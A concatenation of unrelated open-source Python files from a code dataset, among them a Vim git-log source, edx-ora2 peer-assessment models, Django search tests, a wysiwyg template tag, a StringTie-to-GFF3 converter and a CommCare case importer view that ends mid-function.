'pattern': '\\v:[^:]+: ',
},
'containees': [
{
'name': 'gitnLog_separator',
'pattern': '\\v:',
'color': 'Comment',
},
{
'name': 'gitnLog_authorName',
'pattern': '\\v[^:]+',
'color': 'Type',
},
],
}
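# Each candidate line produced by this source looks roughly like
# (see the format string in __async_gather_candidates below):
#   2018/01/02 13:45 *: Author Name : commit subject
# The two highlight tables above colour the "date + graph" prefix and the
# ":author:" segment of such lines; the author and subject here are placeholders.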
class Source(Base):
def __init__(self, vim):
super().__init__(vim)
self.name = 'gitn_log'
self.kind = 'gitn_log'
self.vars = {
'command': ['git'],
'action': ['log'],
'default_opts': [
'--date=default',
'--graph',
'--pretty=format:":::%H:::%P:::%an:::%ae:::%ad:::%at:::%cn:::%ce:::%cd:::%ct:::%s:::"',
],
'separator': ['--'],
'file': [],
'window': 'tab',
}
def on_init(self, context):
self.__proc = None
if len(context['args']) >= 1:
self.vars['file'] = [context['args'][0]]
else:
self.vars['file'] = []
if len(context['args']) >= 2:
if Window.has(context['args'][1]):
self.vars['window'] = context['args'][1]
else:
self.vars['window'] = 'tab'
def on_close(self, context):
if self.__proc:
self.__proc.kill()
self.__proc = None
def highlight(self):
Gitn.highlight(self.vim, DATE_GRAPH_HIGHLIGHT)
Gitn.highlight(self.vim, AUTHOR_NAME_HIGHLIGHT)
def define_syntax(self):
self.vim.command(
'syntax region ' + self.syntax_name + ' start=// end=/$/ '
'contains=gitnLog_dateGraphHeader,gitnLog_authorNameHeader,deniteMathced contained')
def gather_candidates(self, context):
if self.__proc:
return self.__async_gather_candidates(context, 0.5)
commands = []
commands += self.vars['command']
commands += self.vars['action']
commands += self.vars['default_opts']
commands += self.vars['separator']
commands += self.vars['file']
self.__proc = Process(commands, context, self.vim.call('expand', context['path']))
return self.__async_gather_candidates(context, 2.0)
def __async_gather_candidates(self, context, timeout):
outs, errs = self.__proc.communicate(timeout=timeout)
context['is_async'] = not self.__proc.eof()
if self.__proc.eof():
self.__proc = None
candidates = []
for line in outs:
result = self.__parse(line)
if result:
if 'subject' in result and result['subject'] != '':
candidates.append({
'word': '{0} {1}: {2} : {3}'.format(
time.strftime('%Y/%m/%d %H:%M', time.gmtime(result['author']['time'])),
result['graph'],
result['author']['name'],
result['subject'],
),
'action__log': result,
'action__path': context['args'][0] if len(context['args']) >= 1 else '',
'action__window': self.vars['window'],
})
elif 'graph' in result:
candidates.append({
'word': ' {0}'.format(result['graph'].strip()),
})
return candidates
def __parse(self, line):
        m = re.search(r'^([*|/\\ ]+)\s?(.+)?$', line)
        if not m: return {}
        [graph, value] = m.groups()
        if not value: return { 'graph': graph }
splited = value.split(':::')
if len(splited) <= 1: return { 'graph': graph }
[own_hash, parent_hash, author_name, author_email, author_date, author_time, committer_name, committer_email, committer_date, committer_time, subject] = splited[1:-1]
return {
'graph': graph,
'subject': subject,
'hash': {
'own': own_hash,
'parent': parent_hash,
},
'author': {
'name': author_name,
'email': author_email,
'date': author_date,
'time': int(author_time, 10),
},
'committer': {
'name': committer_name,
'email': committer_email,
'date': committer_date,
'time': int(committer_time, 10),
},
}
| mit | 632,974,363,430,759,600 | 29.455056 | 174 | 0.448072 | false |
Lektorium-LLC/edx-ora2 | openassessment/assessment/models/peer.py | 1 | 18730 | """
Django models specific to peer assessment.
NOTE: We've switched to migrations, so if you make any edits to this file, you
need to then generate a matching migration for it using:
./manage.py schemamigration openassessment.assessment --auto
"""
import random
from datetime import timedelta
from django.db import models, DatabaseError
from django.utils.timezone import now
from openassessment.assessment.models.base import Assessment
from openassessment.assessment.errors import PeerAssessmentWorkflowError, PeerAssessmentInternalError
import logging
logger = logging.getLogger("openassessment.assessment.models")
class AssessmentFeedbackOption(models.Model):
"""
Option a student can select to provide feedback on the feedback they received.
`AssessmentFeedback` stands in a one-to-many relationship with `AssessmentFeedbackOption`s:
a student can select zero or more `AssessmentFeedbackOption`s when providing feedback.
Over time, we may decide to add, delete, or reword assessment feedback options.
To preserve data integrity, we will always get-or-create `AssessmentFeedbackOption`s
based on the option text.
"""
text = models.CharField(max_length=255, unique=True)
class Meta:
app_label = "assessment"
def __unicode__(self):
return u'"{}"'.format(self.text)
class AssessmentFeedback(models.Model):
"""
Feedback on feedback. When students receive their grades, they
can provide feedback on how they were assessed, to be reviewed by course staff.
This consists of free-form written feedback
("Please provide any thoughts or comments on the feedback you received from your peers")
as well as zero or more feedback options
("Please select the statements below that reflect what you think of this peer grading experience")
"""
MAXSIZE = 1024 * 100 # 100KB
submission_uuid = models.CharField(max_length=128, unique=True, db_index=True)
assessments = models.ManyToManyField(Assessment, related_name='assessment_feedback', default=None)
feedback_text = models.TextField(max_length=10000, default="")
options = models.ManyToManyField(AssessmentFeedbackOption, related_name='assessment_feedback', default=None)
class Meta:
app_label = "assessment"
def add_options(self, selected_options):
"""
Select feedback options for this assessment.
Students can select zero or more options.
Note: you *must* save the model before calling this method.
Args:
            selected_options (list of unicode): List of options that the user selected.
Raises:
DatabaseError
"""
# First, retrieve options that already exist
options = list(AssessmentFeedbackOption.objects.filter(text__in=selected_options))
# If there are additional options that do not yet exist, create them
new_options = [text for text in selected_options if text not in [opt.text for opt in options]]
for new_option_text in new_options:
options.append(AssessmentFeedbackOption.objects.create(text=new_option_text))
# Add all options to the feedback model
# Note that we've already saved each of the AssessmentFeedbackOption models, so they have primary keys
# (required for adding to a many-to-many relationship)
self.options.add(*options) # pylint:disable=E1101
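# A minimal usage sketch for the feedback models above (the submission UUID,
# feedback text, and option text are hypothetical):
#
#     feedback = AssessmentFeedback.objects.create(
#         submission_uuid='abc123',
#         feedback_text='These assessments were fair.',
#     )
#     feedback.add_options([u'I disagree with one or more of my peer assessments'])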
class PeerWorkflow(models.Model):
"""Internal Model for tracking Peer Assessment Workflow
This model can be used to determine the following information required
throughout the Peer Assessment Workflow:
1) Get next submission that requires assessment.
2) Does a submission have enough assessments?
3) Has a student completed enough assessments?
4) Does a student already have a submission open for assessment?
5) Close open assessments when completed.
6) Should 'over grading' be allowed for a submission?
The student item is the author of the submission. Peer Workflow Items are
created for each assessment made by this student.
"""
# Amount of time before a lease on a submission expires
TIME_LIMIT = timedelta(hours=8)
student_id = models.CharField(max_length=40, db_index=True)
item_id = models.CharField(max_length=128, db_index=True)
course_id = models.CharField(max_length=255, db_index=True)
submission_uuid = models.CharField(max_length=128, db_index=True, unique=True)
created_at = models.DateTimeField(default=now, db_index=True)
completed_at = models.DateTimeField(null=True, db_index=True)
grading_completed_at = models.DateTimeField(null=True, db_index=True)
cancelled_at = models.DateTimeField(null=True, db_index=True)
class Meta:
ordering = ["created_at", "id"]
app_label = "assessment"
@property
def is_cancelled(self):
"""
Check if workflow is cancelled.
Returns:
True/False
"""
return bool(self.cancelled_at)
@classmethod
def get_by_submission_uuid(cls, submission_uuid):
"""
Retrieve the Peer Workflow associated with the given submission UUID.
Args:
submission_uuid (str): The string representation of the UUID belonging
to the associated Peer Workflow.
Returns:
workflow (PeerWorkflow): The most recent peer workflow associated with
this submission UUID.
Raises:
PeerAssessmentWorkflowError: Thrown when no workflow can be found for
the associated submission UUID. This should always exist before a
student is allow to request submissions for peer assessment.
Examples:
>>> PeerWorkflow.get_workflow_by_submission_uuid("abc123")
{
'student_id': u'Bob',
'item_id': u'type_one',
'course_id': u'course_1',
'submission_uuid': u'1',
'created_at': datetime.datetime(2014, 1, 29, 17, 14, 52, 668850, tzinfo=<UTC>)
}
"""
try:
return cls.objects.get(submission_uuid=submission_uuid)
except cls.DoesNotExist:
return None
except DatabaseError:
error_message = (
u"Error finding workflow for submission UUID {}. Workflow must be "
u"created for submission before beginning peer assessment."
).format(submission_uuid)
logger.exception(error_message)
raise PeerAssessmentWorkflowError(error_message)
@classmethod
def create_item(cls, scorer_workflow, submission_uuid):
"""
Create a new peer workflow for a student item and submission.
Args:
scorer_workflow (PeerWorkflow): The peer workflow associated with the scorer.
submission_uuid (str): The submission associated with this workflow.
Raises:
PeerAssessmentInternalError: Raised when there is an internal error
creating the Workflow.
"""
peer_workflow = cls.get_by_submission_uuid(submission_uuid)
try:
workflow_items = PeerWorkflowItem.objects.filter(
scorer=scorer_workflow,
author=peer_workflow,
submission_uuid=submission_uuid
)
if len(workflow_items) > 0:
item = workflow_items[0]
else:
item = PeerWorkflowItem.objects.create(
scorer=scorer_workflow,
author=peer_workflow,
submission_uuid=submission_uuid
)
item.started_at = now()
item.save()
return item
except DatabaseError:
error_message = (
u"An internal error occurred while creating a new peer workflow "
u"item for workflow {}"
).format(scorer_workflow)
logger.exception(error_message)
raise PeerAssessmentInternalError(error_message)
def find_active_assessments(self):
"""Given a student item, return an active assessment if one is found.
Before retrieving a new submission for a peer assessor, check to see if that
assessor already has a submission out for assessment. If an unfinished
assessment is found that has not expired or has not been cancelled,
return the associated submission.
TODO: If a user begins an assessment, then resubmits, this will never find
the unfinished assessment. Is this OK?
Args:
workflow (PeerWorkflow): See if there is an associated active assessment
for this PeerWorkflow.
Returns:
(PeerWorkflowItem) The PeerWorkflowItem for the submission that the
student has open for active assessment.
"""
oldest_acceptable = now() - self.TIME_LIMIT
items = list(self.graded.all().select_related('author').order_by("-started_at", "-id"))
valid_open_items = []
completed_sub_uuids = []
# First, remove all completed items.
for item in items:
if item.assessment is not None or item.author.is_cancelled:
completed_sub_uuids.append(item.submission_uuid)
else:
valid_open_items.append(item)
# Remove any open items which have a submission which has been completed.
        # Iterate over a copy so removals don't skip elements.
        for item in list(valid_open_items):
if (item.started_at < oldest_acceptable or
item.submission_uuid in completed_sub_uuids):
valid_open_items.remove(item)
return valid_open_items[0] if valid_open_items else None
def get_submission_for_review(self, graded_by):
"""
Find a submission for peer assessment. This function will find the next
submission that requires assessment, excluding any submission that has been
completely graded, or is actively being reviewed by other students.
Args:
            graded_by (int): The number of assessments a submission requires
                before it has completed the peer assessment process.
Returns:
submission_uuid (str): The submission_uuid for the submission to review.
Raises:
PeerAssessmentInternalError: Raised when there is an error retrieving
the workflows or workflow items for this request.
"""
timeout = (now() - self.TIME_LIMIT).strftime("%Y-%m-%d %H:%M:%S")
# The follow query behaves as the Peer Assessment Queue. This will
# find the next submission (via PeerWorkflow) in this course / question
# that:
# 1) Does not belong to you
# 2) Does not have enough completed assessments
# 3) Is not something you have already scored.
# 4) Does not have a combination of completed assessments or open
# assessments equal to or more than the requirement.
# 5) Has not been cancelled.
try:
peer_workflows = list(PeerWorkflow.objects.raw(
"select pw.id, pw.submission_uuid "
"from assessment_peerworkflow pw "
"where pw.item_id=%s "
"and pw.course_id=%s "
"and pw.student_id<>%s "
"and pw.grading_completed_at is NULL "
"and pw.cancelled_at is NULL "
"and pw.id not in ("
" select pwi.author_id "
" from assessment_peerworkflowitem pwi "
" where pwi.scorer_id=%s "
" and pwi.assessment_id is not NULL "
") "
"and ("
" select count(pwi.id) as c "
" from assessment_peerworkflowitem pwi "
" where pwi.author_id=pw.id "
" and (pwi.assessment_id is not NULL or pwi.started_at > %s) "
") < %s "
"order by pw.created_at, pw.id "
"limit 1; ",
[
self.item_id,
self.course_id,
self.student_id,
self.id,
timeout,
graded_by
]
))
if not peer_workflows:
return None
return peer_workflows[0].submission_uuid
except DatabaseError:
error_message = (
u"An internal error occurred while retrieving a peer submission "
u"for learner {}"
).format(self)
logger.exception(error_message)
raise PeerAssessmentInternalError(error_message)
def get_submission_for_over_grading(self):
"""
Retrieve the next submission uuid for over grading in peer assessment.
"""
# The follow query behaves as the Peer Assessment Over Grading Queue. This
# will find a random submission (via PeerWorkflow) in this course / question
# that:
# 1) Does not belong to you
# 2) Is not something you have already scored
# 3) Has not been cancelled.
try:
query = list(PeerWorkflow.objects.raw(
"select pw.id, pw.submission_uuid "
"from assessment_peerworkflow pw "
"where course_id=%s "
"and item_id=%s "
"and student_id<>%s "
"and pw.cancelled_at is NULL "
"and pw.id not in ( "
"select pwi.author_id "
"from assessment_peerworkflowitem pwi "
"where pwi.scorer_id=%s"
"); ",
[self.course_id, self.item_id, self.student_id, self.id]
))
workflow_count = len(query)
if workflow_count < 1:
return None
random_int = random.randint(0, workflow_count - 1)
random_workflow = query[random_int]
return random_workflow.submission_uuid
except DatabaseError:
error_message = (
u"An internal error occurred while retrieving a peer submission "
u"for learner {}"
).format(self)
logger.exception(error_message)
raise PeerAssessmentInternalError(error_message)
def close_active_assessment(self, submission_uuid, assessment, num_required_grades):
"""
Updates a workflow item on the student's workflow with the associated
assessment. When a workflow item has an assessment, it is considered
finished.
Args:
submission_uuid (str): The submission the scorer is grading.
assessment (PeerAssessment): The associate assessment for this action.
            num_required_grades (int): The number of grades the peer workflow
                requires to be considered complete.
Returns:
None
"""
try:
item_query = self.graded.filter(
submission_uuid=submission_uuid
).order_by("-started_at", "-id") # pylint:disable=E1101
items = list(item_query[:1])
if not items:
msg = (
u"No open assessment was found for learner {} while assessing "
u"submission UUID {}."
).format(self.student_id, submission_uuid)
raise PeerAssessmentWorkflowError(msg)
item = items[0]
item.assessment = assessment
item.save()
if (
not item.author.grading_completed_at and
item.author.graded_by.filter(assessment__isnull=False).count() >= num_required_grades
):
item.author.grading_completed_at = now()
item.author.save()
except (DatabaseError, PeerWorkflowItem.DoesNotExist):
error_message = (
u"An internal error occurred while retrieving a workflow item for "
u"learner {}. Workflow Items are created when submissions are "
u"pulled for assessment."
).format(self.student_id)
logger.exception(error_message)
raise PeerAssessmentWorkflowError(error_message)
def num_peers_graded(self):
"""
Returns the number of peers the student owning the workflow has graded.
Returns:
integer
"""
return self.graded.filter(assessment__isnull=False).count() # pylint:disable=E1101
def __repr__(self):
return (
"PeerWorkflow(student_id={0.student_id}, item_id={0.item_id}, "
"course_id={0.course_id}, submission_uuid={0.submission_uuid}"
"created_at={0.created_at}, completed_at={0.completed_at})"
).format(self)
def __unicode__(self):
return repr(self)
class PeerWorkflowItem(models.Model):
"""Represents an assessment associated with a particular workflow
Created every time a submission is requested for peer assessment. The
associated workflow represents the scorer of the given submission, and the
assessment represents the completed assessment for this work item.
"""
scorer = models.ForeignKey(PeerWorkflow, related_name='graded')
author = models.ForeignKey(PeerWorkflow, related_name='graded_by')
submission_uuid = models.CharField(max_length=128, db_index=True)
started_at = models.DateTimeField(default=now, db_index=True)
assessment = models.ForeignKey(Assessment, null=True)
# This WorkflowItem was used to determine the final score for the Workflow.
scored = models.BooleanField(default=False)
@classmethod
def get_scored_assessments(cls, submission_uuid):
"""
Return all scored assessments for a given submission.
Args:
submission_uuid (str): The UUID of the submission.
Returns:
QuerySet of Assessment objects.
"""
return Assessment.objects.filter(
pk__in=[
item.assessment.pk for item in PeerWorkflowItem.objects.filter(
submission_uuid=submission_uuid, scored=True
)
]
)
class Meta:
ordering = ["started_at", "id"]
app_label = "assessment"
def __repr__(self):
return (
"PeerWorkflowItem(scorer={0.scorer}, author={0.author}, "
"submission_uuid={0.submission_uuid}, "
"started_at={0.started_at}, assessment={0.assessment}, "
"scored={0.scored})"
).format(self)
def __unicode__(self):
return repr(self)
| agpl-3.0 | 7,839,245,104,259,075,000 | 37.778468 | 112 | 0.609557 | false |
yoshrote/valid_model | setup.py | 1 | 1048 | from setuptools import setup, find_packages
setup(name='valid_model',
version='0.4.0',
description="Generic data modeling and validation",
long_description="""\
""",
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
keywords='',
author='Joshua Forman',
author_email='[email protected]',
url='https://github.com/yoshrote/valid_model',
license='MIT',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
include_package_data=True,
zip_safe=False,
install_requires=[
'six'
],
entry_points="""
# -*- Entry points: -*-
""",
)
| mit | -5,580,786,748,296,095,000 | 31.75 | 72 | 0.542939 | false |
LookThisCode/DeveloperBus | Season 2013/Brazil/Projects/QueroMe-master/search/tests.py | 1 | 3836 | # -*- coding: utf-8 -*-
from django.db import models
from django.test import TestCase
# use immediate_update on tests
from django.conf import settings
settings.SEARCH_BACKEND = 'search.backends.immediate_update'
from search import register
from search.core import startswith
# ExtraData is used for ForeignKey tests
class ExtraData(models.Model):
name = models.CharField(max_length=500)
description = models.CharField(max_length=500)
def __unicode__(self):
return self.name
class Indexed(models.Model):
extra_data = models.ForeignKey(ExtraData, related_name='indexed_model', null=True)
extra_data2 = models.ForeignKey(ExtraData, null=True)
# Test normal and prefix index
one = models.CharField(max_length=500, null=True)
two = models.CharField(max_length=500)
check = models.BooleanField()
value = models.CharField(max_length=500)
register(Indexed, 'one', search_index='one_index', indexer=startswith)
register(Indexed, ('one', 'two'), search_index='one_two_index')
register(Indexed, 'value', integrate=('one', 'check'), search_index='value_index')
# Test filters
class FiltersIndexed(models.Model):
value = models.CharField(max_length=500)
check = models.BooleanField()
register(FiltersIndexed, 'value', filters={'check':True, }, search_index='checked_index')
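# With the registrations above, each index exposes a .search() manager used in
# the tests below, e.g. Indexed.one_index.search('one') or
# Indexed.value_index.search('test-word').filter(check=True).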
class TestIndexed(TestCase):
def setUp(self):
extra_data = ExtraData()
extra_data.save()
Indexed(one=u'foo', two='bar').save()
Indexed(one=u'foo_2', two='bar').save()
for i in range(3):
Indexed(extra_data=extra_data, one=u'OneOne%d' % i).save()
for i in range(3):
Indexed(extra_data=extra_data, one=u'one%d' % i, two='two%d' % i).save()
for i in range(3):
Indexed(extra_data=extra_data, one=(None, u'ÜÄÖ-+!#><|', 'blub')[i],
check=bool(i%2), value=u'value%d test-word' % i).save()
for i in range(3):
FiltersIndexed(check=bool(i%2), value=u'value%d test-word' % i).save()
def test_setup(self):
self.assertEqual(1, len(Indexed.one_two_index.search('foo bar')))
self.assertEqual(len(Indexed.one_index.search('oneo')), 3)
self.assertEqual(len(Indexed.one_index.search('one')), 6)
self.assertEqual(len(Indexed.one_two_index.search('one2')), 1)
self.assertEqual(len(Indexed.one_two_index.search('two')), 0)
self.assertEqual(len(Indexed.one_two_index.search('two1')), 1)
self.assertEqual(len(Indexed.value_index.search('word')), 3)
self.assertEqual(len(Indexed.value_index.search('test-word')), 3)
self.assertEqual(len(Indexed.value_index.search('value0').filter(
check=False)), 1)
self.assertEqual(len(Indexed.value_index.search('value1').filter(
check=True, one=u'ÜÄÖ-+!#><|')), 1)
self.assertEqual(len(Indexed.value_index.search('value2').filter(
check__exact=False, one='blub')), 1)
# test filters
self.assertEqual(len(FiltersIndexed.checked_index.search('test-word')), 1)
self.assertEqual(len(Indexed.value_index.search('foobar')), 0)
def test_change(self):
one = Indexed.one_index.search('oNeone1').get()
one.one = 'oneoneone'
one.save()
value = Indexed.value_index.search('value0').get()
value.value = 'value1 test-word'
value.save()
value.one = 'shidori'
value.value = 'value3 rasengan/shidori'
value.save()
self.assertEqual(len(Indexed.value_index.search('rasengan')), 1)
self.assertEqual(len(Indexed.value_index.search('value3')), 1)
value = Indexed.value_index.search('value3').get()
value.delete()
self.assertEqual(len(Indexed.value_index.search('value3')), 0)
| apache-2.0 | -4,262,808,245,865,043,000 | 35.730769 | 89 | 0.643194 | false |
saydulk/django-wysiwyg | django_wysiwyg/templatetags/wysiwyg.py | 1 | 2413 | from django import template
from django.conf import settings
from django.template.loader import render_to_string
try:
from urlparse import urljoin
except ImportError:
from urllib.parse import urljoin
register = template.Library()
def get_settings():
"""Utility function to retrieve settings.py values with defaults"""
flavor = getattr(settings, "DJANGO_WYSIWYG_FLAVOR", "yui")
return {
"DJANGO_WYSIWYG_MEDIA_URL": getattr(settings, "DJANGO_WYSIWYG_MEDIA_URL", urljoin(settings.STATIC_URL, flavor) + '/'),
"DJANGO_WYSIWYG_FLAVOR": flavor,
}
@register.simple_tag
def wysiwyg_setup(protocol="http"):
"""
Create the <style> and <script> tags needed to initialize the rich text editor.
Create a local django_wysiwyg/includes.html template if you don't want to use Yahoo's CDN
"""
ctx = {
"protocol": protocol,
}
ctx.update(get_settings())
return render_to_string(
"django_wysiwyg/%s/includes.html" % ctx['DJANGO_WYSIWYG_FLAVOR'],
ctx
)
@register.simple_tag
def wysiwyg_editor(field_id, editor_name=None, config=None):
"""
Turn the textarea #field_id into a rich editor. If you do not specify the
JavaScript name of the editor, it will be derived from the field_id.
If you don't specify the editor_name then you'll have a JavaScript object
named "<field_id>_editor" in the global namespace. We give you control of
    this in case you have a complex JS environment.
"""
if not editor_name:
editor_name = "%s_editor" % field_id
ctx = {
'field_id': field_id,
'editor_name': editor_name,
'config': config
}
ctx.update(get_settings())
return render_to_string(
"django_wysiwyg/%s/editor_instance.html" % ctx['DJANGO_WYSIWYG_FLAVOR'],
ctx
)
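# A minimal template usage sketch for the two tags above (the textarea id is
# hypothetical; use the id Django generates for your form field):
#
#     {% load wysiwyg %}
#     {% wysiwyg_setup %}
#     <textarea id="id_body" name="body"></textarea>
#     {% wysiwyg_editor "id_body" %}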
@register.simple_tag
def wysiwyg_static_url(appname, prefix, default_path):
"""
    Automatically use a prefix if a given application is installed.
    For example, if django-ckeditor is installed, use its STATIC_URL/ckeditor folder to find the CKEditor distribution.
    When the application is not available, fall back to the default path.
This is a function for the internal templates of *django-wysiwyg*.
"""
if appname in settings.INSTALLED_APPS:
return urljoin(settings.STATIC_URL, prefix)
else:
return default_path
| mit | -7,762,174,823,449,520,000 | 28.790123 | 126 | 0.675508 | false |
nextgenusfs/funannotate | funannotate/utilities/stringtie2gff3.py | 1 | 3977 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import argparse
import funannotate.library as lib
def dict2gff3(input):
from collections import OrderedDict
'''
function to convert funannotate gene dictionary to gff3 output
'''
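    # Shape of `input` assumed by the code below, inferred from the key
    # accesses in this function (keyed by gene ID; lists are parallel per transcript):
    #   { 'gene-1': { 'contig': ..., 'source': ..., 'type': 'mRNA',
    #                 'location': (start, end), 'strand': '+',
    #                 'ids': [...], 'tpm': [...], 'codon_start': [...],
    #                 'mRNA': [[(start, end), ...]], 'CDS': [[(start, end), ...]],
    #                 '5UTR': [...], '3UTR': [...] }, ... }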
def _sortDict(d):
return (d[1]['contig'], d[1]['location'][0])
# sort the annotations by contig and start location
sGenes = sorted(iter(input.items()), key=_sortDict)
sortedGenes = OrderedDict(sGenes)
# then loop through and write GFF3 format
sys.stdout.write("##gff-version 3\n")
for k, v in list(sortedGenes.items()):
sys.stdout.write("{:}\t{:}\tgene\t{:}\t{:}\t.\t{:}\t.\tID={:};\n".format(
v['contig'], v['source'], v['location'][0], v['location'][1], v['strand'], k))
for i in range(0, len(v['ids'])):
# build extra annotations for each transcript if applicable
# now write mRNA feature
sys.stdout.write("{:}\t{:}\t{:}\t{:}\t{:}\t.\t{:}\t.\tID={:};Parent={:};TPM={:}\n".format(
v['contig'], v['source'], v['type'], v['location'][0], v['location'][1], v['strand'], v['ids'][i], k, v['tpm'][i]))
if v['type'] == 'mRNA':
if '5UTR' in v:
# if 5'UTR then write those first
num_5utrs = len(v['5UTR'][i])
if num_5utrs > 0:
for z in range(0, num_5utrs):
u_num = z + 1
sys.stdout.write("{:}\t{:}\tfive_prime_UTR\t{:}\t{:}\t.\t{:}\t.\tID={:}.utr5p{:};Parent={:};\n".format(
v['contig'], v['source'], v['5UTR'][i][z][0], v['5UTR'][i][z][1], v['strand'], v['ids'][i], u_num, v['ids'][i]))
# write the exons
num_exons = len(v['mRNA'][i])
for x in range(0, num_exons):
ex_num = x + 1
sys.stdout.write("{:}\t{:}\texon\t{:}\t{:}\t.\t{:}\t.\tID={:}.exon{:};Parent={:};\n".format(
v['contig'], v['source'], v['mRNA'][i][x][0], v['mRNA'][i][x][1], v['strand'], v['ids'][i], ex_num, v['ids'][i]))
# if 3'UTR then write
if '3UTR' in v:
num_3utrs = len(v['3UTR'][i])
if num_3utrs > 0:
for z in range(0, num_3utrs):
u_num = z + 1
sys.stdout.write("{:}\t{:}\tthree_prime_UTR\t{:}\t{:}\t.\t{:}\t.\tID={:}.utr3p{:};Parent={:};\n".format(
v['contig'], v['source'], v['3UTR'][i][z][0], v['3UTR'][i][z][1], v['strand'], v['ids'][i], u_num, v['ids'][i]))
if v['type'] == 'mRNA':
num_cds = len(v['CDS'][i])
# GFF3 phase is 1 less than flat file
current_phase = v['codon_start'][i] - 1
for y in range(0, num_cds):
sys.stdout.write("{:}\t{:}\tCDS\t{:}\t{:}\t.\t{:}\t{:}\tID={:}.cds;Parent={:};\n".format(
v['contig'], v['source'], v['CDS'][i][y][0], v['CDS'][i][y][1], v['strand'], current_phase, v['ids'][i], v['ids'][i]))
current_phase = (
current_phase - (int(v['CDS'][i][y][1]) - int(v['CDS'][i][y][0]) + 1)) % 3
if current_phase == 3:
current_phase = 0
def main(args):
# setup menu with argparse
parser = argparse.ArgumentParser(prog='stringtie2gff.py',
description='''Script to convert StringTie GTF file to GFF3.''',
epilog="""Written by Jon Palmer (2018) [email protected]""")
parser.add_argument('-i', '--input', required=True,
help='StringTie GTF file')
args = parser.parse_args(args)
Genes = lib.gtf2dict(args.input)
dict2gff3(Genes)
if __name__ == "__main__":
main(sys.argv[1:])
| bsd-2-clause | -5,736,459,926,717,889,000 | 49.341772 | 144 | 0.451848 | false |
SEL-Columbia/commcare-hq | corehq/apps/importer/views.py | 1 | 10857 | import os.path
from django.http import HttpResponseRedirect, HttpResponseServerError
from casexml.apps.case.models import CommCareCase
from corehq.apps.importer import base
from corehq.apps.importer import util as importer_util
from corehq.apps.importer.tasks import bulk_import_async
from django.views.decorators.http import require_POST
from corehq.apps.users.decorators import require_permission
from corehq.apps.users.models import Permissions
from corehq.apps.app_manager.models import ApplicationBase
from soil.util import expose_download
from soil import DownloadBase
from soil.heartbeat import heartbeat_enabled, is_alive
from django.template.context import RequestContext
from django.contrib import messages
from django.shortcuts import render, render_to_response
from django.utils.translation import ugettext as _
require_can_edit_data = require_permission(Permissions.edit_data)
EXCEL_SESSION_ID = "excel_id"
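# View flow (sketch of how the views below chain together):
#   excel_config      - upload the spreadsheet, stash it via soil, pick a case type
#   excel_fields      - map spreadsheet columns to case properties
#   excel_commit      - start bulk_import_async and hand back a download_id
#   importer_job_poll - poll the async task until the import finishes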
def render_error(request, domain, message):
""" Load error message and reload page for excel file load errors """
messages.error(request, _(message))
return HttpResponseRedirect(base.ImportCases.get_url(domain=domain))
@require_can_edit_data
def excel_config(request, domain):
if request.method != 'POST':
return HttpResponseRedirect(base.ImportCases.get_url(domain=domain))
if not request.FILES:
return render_error(request, domain, 'Please choose an Excel file to import.')
named_columns = request.POST.get('named_columns') == "on"
uploaded_file_handle = request.FILES['file']
extension = os.path.splitext(uploaded_file_handle.name)[1][1:].strip().lower()
# NOTE: We may not always be able to reference files from subsequent
# views if your worker changes, so we have to store it elsewhere
# using the soil framework.
if extension not in importer_util.ExcelFile.ALLOWED_EXTENSIONS:
return render_error(request, domain,
'The Excel file you chose could not be processed. '
'Please check that it is saved as a Microsoft '
'Excel 97/2000 .xls file.')
# stash content in the default storage for subsequent views
file_ref = expose_download(uploaded_file_handle.read(), expiry=1*60*60)
request.session[EXCEL_SESSION_ID] = file_ref.download_id
spreadsheet = importer_util.get_spreadsheet(file_ref, named_columns)
if not spreadsheet:
return _spreadsheet_expired(request, domain)
columns = spreadsheet.get_header_columns()
row_count = spreadsheet.get_num_rows()
if row_count == 0:
return render_error(request, domain,
'Your spreadsheet is empty. '
'Please try again with a different spreadsheet.')
case_types_from_apps = []
# load types from all modules
for row in ApplicationBase.view('app_manager/types_by_module',
reduce=True,
group=True,
startkey=[domain],
endkey=[domain,{}]).all():
if not row['key'][1] in case_types_from_apps:
case_types_from_apps.append(row['key'][1])
case_types_from_cases = []
# load types from all case records
for row in CommCareCase.view('hqcase/types_by_domain',
reduce=True,
group=True,
startkey=[domain],
endkey=[domain,{}]).all():
if row['key'][1] and not row['key'][1] in case_types_from_cases:
case_types_from_cases.append(row['key'][1])
# for this we just want cases that have data but aren't being used anymore
case_types_from_cases = filter(lambda x: x not in case_types_from_apps, case_types_from_cases)
if len(case_types_from_apps) == 0 and len(case_types_from_cases) == 0:
return render_error(request, domain,
'No cases have been submitted to this domain and there are no '
'applications yet. You cannot import case details from an Excel '
'file until you have existing cases or applications.')
return render(request, "importer/excel_config.html", {
'named_columns': named_columns,
'columns': columns,
'case_types_from_cases': case_types_from_cases,
'case_types_from_apps': case_types_from_apps,
'domain': domain,
'report': {
'name': 'Import: Configuration'
},
'slug': base.ImportCases.slug})
@require_POST
@require_can_edit_data
def excel_fields(request, domain):
named_columns = request.POST['named_columns']
case_type = request.POST['case_type']
search_column = request.POST['search_column']
search_field = request.POST['search_field']
create_new_cases = request.POST.get('create_new_cases') == 'on'
key_value_columns = request.POST.get('key_value_columns') == 'on'
key_column = ''
value_column = ''
download_ref = DownloadBase.get(request.session.get(EXCEL_SESSION_ID))
spreadsheet = importer_util.get_spreadsheet(download_ref, named_columns)
if not spreadsheet:
return _spreadsheet_expired(request, domain)
columns = spreadsheet.get_header_columns()
if key_value_columns:
key_column = request.POST['key_column']
value_column = request.POST['value_column']
excel_fields = []
key_column_index = columns.index(key_column)
# if key/value columns were specified, get all the unique keys listed
if key_column_index:
excel_fields = spreadsheet.get_unique_column_values(key_column_index)
# concatenate unique key fields with the rest of the columns
excel_fields = columns + excel_fields
# remove key/value column names from list
excel_fields.remove(key_column)
if value_column in excel_fields:
excel_fields.remove(value_column)
else:
excel_fields = columns
case_fields = importer_util.get_case_properties(domain, case_type)
# hide search column and matching case fields from the update list
    try:
        excel_fields.remove(search_column)
    except ValueError:
        pass
    try:
        case_fields.remove(search_field)
    except ValueError:
        pass
    # we can't actually update this so don't show it
    try:
        case_fields.remove('type')
    except ValueError:
        pass
return render(request, "importer/excel_fields.html", {
'named_columns': named_columns,
'case_type': case_type,
'search_column': search_column,
